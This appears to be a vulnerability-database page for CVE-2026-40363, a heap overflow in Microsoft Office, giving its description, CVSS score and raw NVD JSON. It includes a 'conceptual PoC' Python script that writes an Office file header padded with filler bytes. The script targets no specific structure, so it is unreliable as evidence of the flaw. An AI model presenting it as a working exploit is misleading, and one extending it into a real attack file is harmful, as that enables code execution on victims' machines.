Security Vulnerability Report
中文
CVE-2026-40363 CVSS 8.4 HIGH

CVE-2026-40363

Published: 2026-05-12 18:17:15
Last Modified: 2026-05-13 15:34:53

Description

Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Microsoft Office (具体受影响版本未披露)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct # Conceptual PoC for CVE-2026-40363 # This script generates a malformed file intended to trigger the heap overflow. # Note: Actual exploitation requires precise offset calculation and payload alignment. def generate_malicious_file(filename): # File header placeholder (e.g., for a generic Office format) header = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1" # Padding to reach the vulnerable structure padding = b"A" * 0x100 # Overflow payload # In a real scenario, this would contain ROP chains and shellcode overflow_payload = b"B" * 0x200 data = header + padding + overflow_payload with open(filename, "wb") as f: f.write(data) print(f"[+] Malicious file generated: {filename}") if __name__ == "__main__": generate_malicious_file("cve_2026_40363_poc.doc")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-40363", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:15.217", "lastModified": "2026-05-13T15:34:52.573", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40363", "source": "[email protected]"}]}}